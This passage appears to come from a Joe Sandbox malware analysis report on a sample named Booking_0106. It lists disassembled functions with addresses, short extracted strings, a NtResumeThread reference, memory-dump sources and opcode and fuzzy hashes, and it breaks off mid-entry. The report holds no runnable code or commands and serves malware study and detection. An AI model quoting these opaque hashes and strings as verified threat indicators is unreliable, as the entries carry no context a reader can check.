API String ID: 2706961497-0
Opcode ID: b0fc71c15ab3d3cbd65cfb88d104e32fc3d13a5958095c737737e0d4d1d4affa
Instruction ID: ac49b17299f399f8e3a75d741f7c71bb6c0b131c52c3d67a1136dd41209e5bad
Opcode Fuzzy Hash: b0fc71c15ab3d3cbd65cfb88d104e32fc3d13a5958095c737737e0d4d1d4affa
Instruction Fuzzy Hash: 824187B9D002589FCF10CFA9D981AEEFBB1BB09314F14942AE819B7210D735A945CF68

Function 05A210D1 Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05A21166

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 05add044b4b54a54f719134791769701a3343171f2cb4abdfe69464b858c81d7
Instruction ID: b4a1a23795f43f7ecb5f4cacc5b409aa3fd80d60317e4516ee0a4b87373652d3
Opcode Fuzzy Hash: 05add044b4b54a54f719134791769701a3343171f2cb4abdfe69464b858c81d7
Instruction Fuzzy Hash: 2731ABB5D012589FCB10CFAAD981ADEFBF1BB49310F10942AE819B7300C735A945CF98

Function 05A210D8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 05A21166

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1eafeaf7635dad15b628aeb9427b7679e003abe04c079649c35c11504f7ce64f
Instruction ID: 8348116007a26b26446b837a06cf317f3161a4173f9f4fb6d3077712f204441d
Opcode Fuzzy Hash: 1eafeaf7635dad15b628aeb9427b7679e003abe04c079649c35c11504f7ce64f
Instruction Fuzzy Hash: 6831AAB4D012589FCB10CFAAD980ADEFBF1BB49310F20942AE819B7300C735A945CF94

Function 05A37F78 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05A38274

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: aa4c7bd193af85c81dd2a06a1c7b4a7015f73f4497d0a2e8aa244d15447c4d89
Instruction ID: 7c4db445b7bfd7ede4eb04bc71beb586871f58c1b0fa9942bd24f68fcd3e474f
Opcode Fuzzy Hash: aa4c7bd193af85c81dd2a06a1c7b4a7015f73f4497d0a2e8aa244d15447c4d89
Instruction Fuzzy Hash: 4EC12874D06219CFDB54CFA9D849BADBBF2BF49308F1081AAF019A7251DBB90985CF00

Function 05957098 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

Te^q, xrefs: 059571C0

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 92a8d2ddc6693af30e14928660f1536873c7455441c5acb7888c0a14a84d5004
Instruction ID: 7cdcd86431392e5fd1c4a39c4d4a7a1537738d93f0aeba1bd1b2e3c378c75d41
Opcode Fuzzy Hash: 92a8d2ddc6693af30e14928660f1536873c7455441c5acb7888c0a14a84d5004
Instruction Fuzzy Hash: ABC12A70D05218CFDB24CFA9D988BADBBF6FF48354F10856AE809A7251DB705A95CF10

Function 05A37F69 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

PH^q, xrefs: 05A38274

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 37cbf149f2c60517c7746382c2c187ccb107f332930fadc85fe37fff5a79de6d
Instruction ID: 209b12826342c44f831bd8e63c8608122142d6739381845742bd7e72e06f2925
Opcode Fuzzy Hash: 37cbf149f2c60517c7746382c2c187ccb107f332930fadc85fe37fff5a79de6d
Instruction Fuzzy Hash: D8C11974D06219CFDB54CFA9D949BADBBF2BF49308F1081AAF019A7255DBB90985CF00

Function 014318A6 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01431B40

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: c141f3cb0d69fa018182c50079391fd28611643889b969a3f11a3850a07731c3
Instruction ID: d7e04c0c273885c6f7e496c55c10008008eb22835dcf994712636681c85cb881
Opcode Fuzzy Hash: c141f3cb0d69fa018182c50079391fd28611643889b969a3f11a3850a07731c3
Instruction Fuzzy Hash: 1A915431E111198FDB15DF69C990AADBBB3BFC8704F29C5AAD005AB295D734AD82CF40

Function 01430BB0 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

\s^q, xrefs: 01430D23

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: af149c7a064a333cc0e746b9b526a834c4a8813ae71799b033b4ffb4b4553058
Instruction ID: 074385cf06004831affabf07894520d7e982ce3cce83ac88160211c87daa2ec2
Opcode Fuzzy Hash: af149c7a064a333cc0e746b9b526a834c4a8813ae71799b033b4ffb4b4553058
Instruction Fuzzy Hash: 25810A78E4010E9FDF14CFA9D584ABEBBF1BF88310F10A659D416EB2A5DB31A941CB50

Function 05957380 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

Te^q, xrefs: 059571C0

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 2bfcbdb1f473346aa5ec6d57c35bce29b8af92b61d97ff9d1310ee0b20152ac7
Instruction ID: 66f7955dbc07d2a8d8b2ec0bf1c229b5f488f9c6e11fc655221e7568bbc897e9
Opcode Fuzzy Hash: 2bfcbdb1f473346aa5ec6d57c35bce29b8af92b61d97ff9d1310ee0b20152ac7
Instruction Fuzzy Hash: 7E91F874E05208CFDB24CFA9D988BADBBF2FF49354F20816AE809A7255D7745A95CF00

Function 0143B69C Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 426bad027fb5fdc026393a5879cb795aa68503ce94b9781b79dae409a1d5b7c9
Instruction ID: 4533130ea98d33888f9c9cf7e7f28b3e571e1713ed102d5a775e0f0233cc026d
Opcode Fuzzy Hash: 426bad027fb5fdc026393a5879cb795aa68503ce94b9781b79dae409a1d5b7c9
Instruction Fuzzy Hash: 4C32B674A152298FCB65DF28C984BA9BBB5FF48300F1081E9E54DA7365DB30AE81CF54

Function 05956308 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfceace24c34e6e8db970546f06e69175193f2105cd7836cae7c974c5e67673
Instruction ID: d5e854550154d67f9b1e4896ee92dba3e7a46263fa514954554569d8b23d6421
Opcode Fuzzy Hash: dbfceace24c34e6e8db970546f06e69175193f2105cd7836cae7c974c5e67673
Instruction Fuzzy Hash: BEF16874E05218CFDB24CF69D888BEDBBF2FB45324F5081AAD909A7250DB745A98CF01

Function 059562F8 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1045ef7188fab9e57bcc8ef2a192db06a4f9f34db084a0acde98b3891d1e966b
Instruction ID: 1c2f8361a2528db0b7b4a599043a738c398e08ea3b7389888e79708e89831f95
Opcode Fuzzy Hash: 1045ef7188fab9e57bcc8ef2a192db06a4f9f34db084a0acde98b3891d1e966b
Instruction Fuzzy Hash: 49F15774E05218CFDB24CF69D888BEDBBF2FB45324F5081AAD909A7250DB745A98CF01

Function 05A2D920 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40353dccf07ec4002598dbce2f3dbc291415edd45bfaf6af3a5e03926dbe9dd8
Instruction ID: 8bd9df81e85fd0014c0e28410546adc38b289447efa7f017fc4defa051e90af3
Opcode Fuzzy Hash: 40353dccf07ec4002598dbce2f3dbc291415edd45bfaf6af3a5e03926dbe9dd8
Instruction Fuzzy Hash: 3FE13274E01228CFDB14DFA9D859BADBBF2FB49304F00816AE40AAB285DB745946CF50

Function 05A2D910 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f9f9f39481d4faffbadea0cc79fe57148d5004eeb5a59fd51f2e03c397d01c
Instruction ID: 9a2bbc1c09753dac7b1c0f38e97c1a112ec8b716fc6a7fb288fa95543e355853
Opcode Fuzzy Hash: e5f9f9f39481d4faffbadea0cc79fe57148d5004eeb5a59fd51f2e03c397d01c
Instruction Fuzzy Hash: E5E12374E01228CFDB14DFA9D859BADBBF2FB49304F00816AE40AAB385DB745946CF51

Function 05A2C0A8 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dad73bc5f0e59fdb9dbebe91664bb0f20253e495f2c366a3a09a5947a489d58b
Instruction ID: 2597afc8c498ffd7d8a19e2fa622f76711a87ec1e0179ba5f4a798be27a109e1
Opcode Fuzzy Hash: dad73bc5f0e59fdb9dbebe91664bb0f20253e495f2c366a3a09a5947a489d58b
Instruction Fuzzy Hash: E2E11774E01218DFDB14DF69D8A9BADBBB2FB89310F0081AAD509AB394DB305D85CF11

Function 05A373B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8429675c28ffb546a08b50de49760ffdba10ae35796ef4e576ff68226cf888f9
Instruction ID: 25db8b8ac2dbbdf126ff265d6915265c3f93fb4343e63d236d477dcf9f9a170c
Opcode Fuzzy Hash: 8429675c28ffb546a08b50de49760ffdba10ae35796ef4e576ff68226cf888f9
Instruction Fuzzy Hash: B0E13FB4E01258CFDB54DF68D995BADBBF2FB49304F1081AAE109AB284DB745E85CF01

Function 05A373A0 Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779dbf6fe178416eea38b286636aee91fedf3335578b94c6c818824e31781a50
Instruction ID: 7192350aacdc1e30f1dfe4c68f0a9e70cd6a922016d2b516b685d715ea07c854
Opcode Fuzzy Hash: 779dbf6fe178416eea38b286636aee91fedf3335578b94c6c818824e31781a50
Instruction Fuzzy Hash: F2D15EB4E01258CFDB54DF68D995BADBBF2FB49304F1081AAE109AB284DB745E85CF01

Function 05A2CD88 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f657dc49406b0e404074cb2b221da2632a674ad0168beed2bdf61f89e63185df
Instruction ID: f1d10e840ebfbdefaf6a91ee7df76f790dce55b39d17e91c00d674ef6d5d51ce
Opcode Fuzzy Hash: f657dc49406b0e404074cb2b221da2632a674ad0168beed2bdf61f89e63185df
Instruction Fuzzy Hash: BCD13574E06218CFDB54DF69D999BADBBF2FB49300F1081AAD009A7295DB705D86CF01

Function 05A2CD98 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53b57e02bedda0c889f2525c8f7c5630ea43e1b8f3f026daa1abd5a789771027
Instruction ID: 7dbf4a2122fdff8e47d4090e57f1e2d4e2404073b762a12c4d65c9743f86df2e
Opcode Fuzzy Hash: 53b57e02bedda0c889f2525c8f7c5630ea43e1b8f3f026daa1abd5a789771027
Instruction Fuzzy Hash: 0ED13574E06218CFDB54DF69D999BADBBF2BB49300F1081AAD009A7395DB705D86CF01

Function 05A2CEF3 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca0401f10410576d65483066708955d366a21cc02b82638f528a363aff83b43
Instruction ID: bb5f0a2a29f856ca9db8e7f9559228c3848020ab0ffbec7360289d3050dd740d
Opcode Fuzzy Hash: 8ca0401f10410576d65483066708955d366a21cc02b82638f528a363aff83b43
Instruction Fuzzy Hash: 32C11774E05228CFDB54DF68D999FADBBF2BB49304F1081AAD009A7295DB709D85CF01

Function 05A2A6B8 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62b3d17f9254970b3cd6d92d6cd702bc4221999fbf267b654e66eebe31df95b
Instruction ID: f984cc8e4f0e651d8f3e12920aa17899f311156687c3801331ebaf0847018a7e
Opcode Fuzzy Hash: e62b3d17f9254970b3cd6d92d6cd702bc4221999fbf267b654e66eebe31df95b
Instruction Fuzzy Hash: CDB10174E01218CFDB14CFAAD599BADBBF3FB89300F10916AD419AB255DBB45886CF04

Function 05A2A6C8 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f055786adb6d2bf9b6b5c50158c9593702062e845447a756c881a24bec09a1
Instruction ID: 7c2d4f5ce417510567b94a3a202f72b9c70da7bbd9ba36aed294bee172965efd
Opcode Fuzzy Hash: 42f055786adb6d2bf9b6b5c50158c9593702062e845447a756c881a24bec09a1
Instruction Fuzzy Hash: F591F074E01218CFDB14CFAAD585BADBBF3FB89300F10916AE419AB255DBB45886CF04

Function 05A3D3C8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4369519b8341ea58503d0bb18eb9c740a3fc44fdcebee3541c68ef0e6cedce
Instruction ID: 450a43f04172825b8cf1376143cf9feb8e9c234909328f3a2898047b448a7823
Opcode Fuzzy Hash: be4369519b8341ea58503d0bb18eb9c740a3fc44fdcebee3541c68ef0e6cedce
Instruction Fuzzy Hash: E7A1E574E00219CFCB54DF69C955BAEBBF2BF88300F1081AA950DAB355DB30AD858F51

Function 05A22EE9 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732195677.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a20000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718336c33426aab7ec036ed2093669fb49c5922df27758a88aef47a87220175d
Instruction ID: ee67953744b7695d00ba77509e9f9c0554e42329429ab41e1b765e117564ce0c
Opcode Fuzzy Hash: 718336c33426aab7ec036ed2093669fb49c5922df27758a88aef47a87220175d
Instruction Fuzzy Hash: DE910278A05258CFDB14DFA8C499BEDBBF2FF49304F2080AAD409AB295CB755985CF01

Function 05A3D3D8 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91798f80c6ac7ac0b18c5592681751299a7c14afc44bc149df352ea1ed8b3bda
Instruction ID: 5990ad673e82404f884af968ab7d33031367e612d4e417ae9f613fbe99694e6a
Opcode Fuzzy Hash: 91798f80c6ac7ac0b18c5592681751299a7c14afc44bc149df352ea1ed8b3bda
Instruction Fuzzy Hash: 3AA1E674E00219CFCB54DF69C955BAEBBF6BF88300F1081AAA50DAB355DB30AD858F51

Function 05A3F298 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6308676f39ce0e41408953c926a10681402cb9ade2fc7058bb9d18f7d017b40
Instruction ID: 7bc964572ac1334b05fbac949fbbb367cd5f2c17e85fef6fe7bdba239b55c026
Opcode Fuzzy Hash: d6308676f39ce0e41408953c926a10681402cb9ade2fc7058bb9d18f7d017b40
Instruction Fuzzy Hash: 49814874E11208DFCB04DFA9D995AAEBBF6FF88300F14806AE519AB395DB349905CF50

Function 05A3D66E Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b61b60317b3fb31166563560aeecbd12974246b5a7d79733737881ee0f1f71b
Instruction ID: 1e1b754899fc702512676550ef634c87678c8c3e91bb912597a16a73f78e4da7
Opcode Fuzzy Hash: 0b61b60317b3fb31166563560aeecbd12974246b5a7d79733737881ee0f1f71b
Instruction Fuzzy Hash: 8381E674A00219CFCB54DF69C955B9EBBF2BF88300F1081AAD50EAB395DB31AD858F51

Function 05A3F2A8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144cc48fd24e1c8c10846d862a500e2311c83e40cc31b7b2e65408e0502ed5b2
Instruction ID: 106a65889595207316c58954bb13a38a11655615302620ce55e5a6a6fc8d3c83
Opcode Fuzzy Hash: 144cc48fd24e1c8c10846d862a500e2311c83e40cc31b7b2e65408e0502ed5b2
Instruction Fuzzy Hash: 5F712A74E11209DFCB44DFA9D595AAEBBF6FF88300F10802AE509AB394DB34A945CF51

Function 059E9570 Relevance: 7.7, Strings: 6, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 059E9642
pbq, xrefs: 059E96C7
4'^q, xrefs: 059E95F4
4'^q, xrefs: 059E9624
4'^q, xrefs: 059E96BA
(bq, xrefs: 059E973A

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: f1a9b718e149dfd707c3b049c3e7316eef713ca1c298d4972ade47a54e5b0cf7
Instruction ID: befa9431d2ba78be4b19f0da9d893144a7910b404694d8ffdd9a41d646ebc930
Opcode Fuzzy Hash: f1a9b718e149dfd707c3b049c3e7316eef713ca1c298d4972ade47a54e5b0cf7
Instruction Fuzzy Hash: 2E517230A402098FC709DF79C5506AFBAE7BFC9300F14892984099B7A9DF75DD4A8BA1

Function 059E82A8 Relevance: 4.2, Strings: 3, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 059E877D
Hbq, xrefs: 059E87AC
Hbq, xrefs: 059E87FC

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: c7e5dc5db4246c0f9b385a0f157a389cc576d0510c425e764f1cc0147a53ac46
Instruction ID: 02ba9236202707d353379356f6898583ce46e522fbcd0dfb2dd0ae2e5f4cbd6d
Opcode Fuzzy Hash: c7e5dc5db4246c0f9b385a0f157a389cc576d0510c425e764f1cc0147a53ac46
Instruction Fuzzy Hash: 5C123B75A006059FCB26DFA9C494A6EBBF6FF88300F14852DE406AB395DB35EC46CB50

Function 059E9F68 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 059EA182
4'^q, xrefs: 059EA261
4'^q, xrefs: 059EA2E1

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 1ba234d0a1e13fcd1825185381e6b56321bf44c3e6e471f1512dd5590eceb5d6
Instruction ID: 0f1797ca7656474870f97f41aaef45ebf7e80125c0e708f9164e0c9811b38764
Opcode Fuzzy Hash: 1ba234d0a1e13fcd1825185381e6b56321bf44c3e6e471f1512dd5590eceb5d6
Instruction Fuzzy Hash: C4F1B834A10118DFCB19DFA4D998EADBBB2FF89301F158158E406AB3A5DB71EC46CB50

Function 059EE530 Relevance: 4.1, Strings: 3, Instructions: 360
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 059EE6C1
(bq, xrefs: 059EE695
(bq, xrefs: 059EE669

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: (bq$(bq$Hbq
API String ID: 0-2835675688
Opcode ID: 6e0166cc997644628a0cb552d5eda4efc23b7e2529899ca3da8e21ffc48e28a6
Instruction ID: 6fbab124c2e784f0f2fd4060349a78a936d6c731175ecc0babf0562031076a9a
Opcode Fuzzy Hash: 6e0166cc997644628a0cb552d5eda4efc23b7e2529899ca3da8e21ffc48e28a6
Instruction Fuzzy Hash: E8E11C34A11209DFCB05EFA4D4989ADBBB6FF89310F148569E406AB365DF30ED46CB90

Function 059E47A4 Relevance: 3.1, Strings: 2, Instructions: 551
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 059E4B23
$^q, xrefs: 059E4B13

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 997fd5e5230ecc79a540663b3b3476d8f057d36f7c49604923811f434cade701
Instruction ID: 7d98529201e9d8e3c2443cb4023ae4e228fd6e7ac7138faafa0e228a3cf3fd6a
Opcode Fuzzy Hash: 997fd5e5230ecc79a540663b3b3476d8f057d36f7c49604923811f434cade701
Instruction Fuzzy Hash: 2C327A34E002199FCF06DFA5D858AEDBBB6FF88304F148415E816AB295DB35AD46CF90

Function 057B1DA8 Relevance: 3.0, Strings: 2, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 057B244B
4'^q, xrefs: 057B243B

Memory Dump Source

Source File: 00000000.00000002.1731175276.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57b0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 177dabfe7d683e9f7ddfcd92b2ae7304f32086cd2d24d6c7afb8d9846ee1bc8c
Instruction ID: b452e99b99d90f123d9303b9214a267fc03d8cfe7e8ed6e2ab9c2a9449b7184f
Opcode Fuzzy Hash: 177dabfe7d683e9f7ddfcd92b2ae7304f32086cd2d24d6c7afb8d9846ee1bc8c
Instruction Fuzzy Hash: 1A22F438E16218CFDB24DFA8C554AEDBBB2BF49305F208169E406AB385DB795D85CF10

Function 057B18C0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 057B1D66
4'^q, xrefs: 057B1D56

Memory Dump Source

Source File: 00000000.00000002.1731175276.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57b0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 6a32e4b060190865e66ee8e23bb255369034f7c62f12802258305559d50a0d63
Instruction ID: e2311051adeacfbe85aef69c0876a071a06a55c4882c62a166f7775412c520a4
Opcode Fuzzy Hash: 6a32e4b060190865e66ee8e23bb255369034f7c62f12802258305559d50a0d63
Instruction Fuzzy Hash: 62F1C278E15208DFDB28DFA4E5A8AEDBBB2FF49315F608529E406A7250DB705D85CF00

Function 059E7958 Relevance: 2.8, Strings: 2, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

